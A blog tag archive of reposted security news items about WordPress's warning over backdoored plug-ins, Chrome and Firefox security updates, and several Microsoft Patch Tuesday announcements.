Posts tagged as:

patch

WordPress Warns Of Trojanized Plug-Ins, Urges Patching

Wordpress Security

Wordpress Security

Attackers added a back door to three plug-ins that were available for download from WordPress for more than 24 hours.

WordPress on Tuesday warned all users who run its software on their own servers to beware a trio of malicious plug-ins for its content management software, which may have been available for download from the site for more than 24 hours.

“Earlier today the WordPress team noticed suspicious commits to several popular plugins–AddThis, WPtouch, and W3 Total Cache–containing cleverly disguised backdoors. We determined the commits were not from the authors, rolled them back, pushed updates to the plugins, and shut down access to the plugin repository while we looked for anything else unsavory,” said a warning from Matt Mullenweg, founding developer of WordPress, released on Tuesday.

Plug-ins extend WordPress functionality, and the ones called out in the security warning offer an interface with social networking sites (AddThis), mobile and iPad versions of WordPress blogs (WPtouch), and server performance enhancements (W3 Total Cache). AddThis and W3 Total Cache have been downloaded at least 500,000 times, and the free version of WPtouch, more than two million times.

Mullenweg said that while an investigation is underway and there’s no evidence that attackers compromised the WordPress site, WordPress just to be safe has forcibly reset all passwords for WordPress.org, which is the site where users can download WordPress. “To use the forums, [development site] Trac, or commit to a plugin or theme, you’ll need to reset your password to a new one”–by using the log-in page–said Mullenweg.

Plug-ins extend WordPress functionality, and the ones called out in the security warning offer an interface with social networking sites (AddThis), mobile and iPad versions of WordPress blogs (WPtouch), and server performance enhancements (W3 Total Cache). AddThis and W3 Total Cache have been downloaded at least 500,000 times, and the free version of WPtouch, more than two million times.

Mullenweg said that while an investigation is underway and there’s no evidence that attackers compromised the WordPress site, WordPress just to be safe has forcibly reset all passwords for WordPress.org, which is the site where users can download WordPress. “To use the forums, [development site] Trac, or commit to a plugin or theme, you’ll need to reset your password to a new one”–by using the log-in page–said Mullenweg.

In addition, he said that any users of the three Trojanized plug-ins who updated them “in the past day” (meaning Monday or Tuesday) should upgrade those plug-ins immediately.

Plug-ins, malicious or otherwise, continue to account for an increasing number of vulnerabilities seen in applications, both on PCs (for example, with browsers) and in Web applications (such as WordPress). In terms of WordPress, plug-ins now account for 80% of all WordPress-related vulnerabilities, according to HP DVLabs.

But some plug-in vulnerabilities are worse than others. “Web-based backdoors can be extremely dangerous,” said Paul Ducklin, head of technology for Sophos in the Asia Pacific region, in a blog post. “If you’re a WordPress user, you’ll know that the WordPress platform includes a complete and powerful administration interface, password-protected, via a URL such as “site.example/wp-admin.” A WordPress backdoor might offer something with similar functionality, but using a different, unexpected, URL, and using a password known to the hacker, instead of to you.”

Another danger is that if attackers managed to steal WordPress passwords, they might attempt to use them to access other sites. According to Mullenweg, “as a user, make sure to never use the same password for two different services, and we encourage you not to reset your password to be the same as your old one.”

Unfortunately, password reuse remains rampant as numerous, recent attacks have shown, such as when LulzSec released stolen databases containing usernames and passwords–such as the release of 37,608 SonyPictures.com passwords, which researchers have cross-referenced with other leaked databases.

http://www.informationweek.com/news/security/vulnerabilities/231000230

{ Comments on this entry are closed }

Google and Mozilla Fix Browser Flaws

Google and Mozilla Fix Browser Flaws

Google and Mozilla Fix Browser Flaws

Google and Mozilla have released new versions of their browsers, plugging plenty of security holes along the way.

Hundreds of bugs have been fixed in the Google Chrome update, after the company said it would be releasing a “new stable version” of the browser every six weeks.

So far Google has followed through with its promise and introduced the patches along with a new HTML5 parser and file API, among other features.

“Also, if you choose to block sites from setting any data in your browser’s content settings for cookies, you can now use a new dialog for managing blocked cookies in bulk,” noted Jeff Chang, product manager for Google Chrome, in a blog.

Google recently launched a security advice page offering some tips on how users can protect themselves from hackers.

Mozilla, meanwhile, has made Firefox versions 3.6.11 and 3.5.14 available for download, patching nine vulnerabilities along the way.

Five of the flaws were ranked as critical, meaning they could be exploited “to run attacker code and install software, requiring no user interaction beyond normal browsing,” Mozilla explained.

“As always, we recommend that users keep up to date with the latest stability and support versions of Firefox, and encourage all our users to upgrade to the very latest version, Firefox 3.6.11,” advised Firefox release manager Christian Legnitto.


from » http://www.itpro.co.uk

Need help with virus and malware removal? Have questions about computer cleanup and system optimization? You can contact me here.

{ Comments on this entry are closed }

Microsoft: Biggest Patch Tuesday Ever

Microsoft plans biggest Patch Tuesday ever

Microsoft plans biggest Patch Tuesday ever

Microsoft is due to issue its biggest ever Patch Tuesday, with 16 bulletins set to be addressed.

Microsoft has planned its biggest ever Patch Tuesday for October, with a total of 49 vulnerabilities set to be fixed. This is over three times the number of security holes fixed in last month’s Patch Tuesday.

Of the 16 bulletins, four have been rated critical, where the flaws could lead to remote code execution. These four affected all versions of Windows.

One of the critical vulnerabilities affects Internet Explorer versions 6, 7 and 8, whilst two of the flaws, classed as “important,” affected Microsoft Office – one for Word and one for Excel on all platforms.

This Patch Tuesday announcement also marked the first time Microsoft Word 2010 had been included in an advisory.

The vulnerabilities are due to be patched on 12 October.

{ Comments on this entry are closed }

Microsoft to Patch 34 Vulnerabilities on Tuesday, 3 Critical

Microsoft to Release Two Critical Patches

Microsoft Addressing 34 Vulnerabilitie

Next week’s Patch Tuesday will see 10 bulletins from Microsoft addressing 34 vulnerabilities.

Microsoft is set to tackle a huge number of vulnerabilities on next week’s Patch Tuesday.

The company revealed today it would address 34 security flaws through 10 separate bulletins, three of which are marked “critical.” The other seven are flagged up as “important.”

The critical vulnerabilities are known to affect all versions of Windows, as well as Internet Explorer, while the latter seven cover Windows and Office.

Although Microsoft has warned on its Security Response Centre blog that administrators need to be prepared as always for the patches, the wider security industry are warning users to be extra vigilant.

“The June release is a large update and will keep system administrators busy, even if they have migrated to Windows 7 already,” said Wolfgang Kandek, chief technology officer at Qualys, in a statement.

Alan Bentley, vice president of international at Lumension, added in a statement: “The impact will be felt enterprise-wide with bulletins covering a large portion of Microsoft’s range of operating systems and Windows and Office products.”

“It is strongly suggested that IT administrators plan ahead and prioritise this patch load as soon as possible.”

Last month’s Patch Tuesday only saw two bulletins released, but both were critical updates.


from » http://www.itpro.co.uk

Need help with virus and malware removal? Have questions about computer cleanup and system optimization? You can contact me here.

{ Comments on this entry are closed }

Microsoft to Release Two Critical Patches

Microsoft to Release Two Critical Patches

Critical Updates

Microsoft has confirmed two critical bulletins for next week’s patch Tuesday.

Next week’s patch Tuesday will see Microsoft releasing two critical updates to its users.

The flaws are marked as critical for Windows 2000, XP, Vista, Server 2003 and Server 2008 users whilst Windows 7 and Server 2008 R2 users are advised it is “important” to download, although they are not vulnerable.

The two bulletins – one for Word and one for Windows – are due on 9 May. However, the recent flaw discovered across all versions of its Internet Explorer browser, making SharePoint vulnerable, is going un-patched.

“Our teams are still working on an update for that issue,” claimed Jerry Bryant, group manager of Response Communications at Microsoft, in a blog post.

“In the meantime, we recommend customers review the advisory and apply the workarounds.”

This month’s patch Tuesday is much smaller than the one in April which saw Microsoft fix 25 flaws across 11 patches.


from » http://www.itpro.co.uk

Need help with virus and malware removal? Have questions about computer cleanup and system optimization? You can contact me here.

{ Comments on this entry are closed }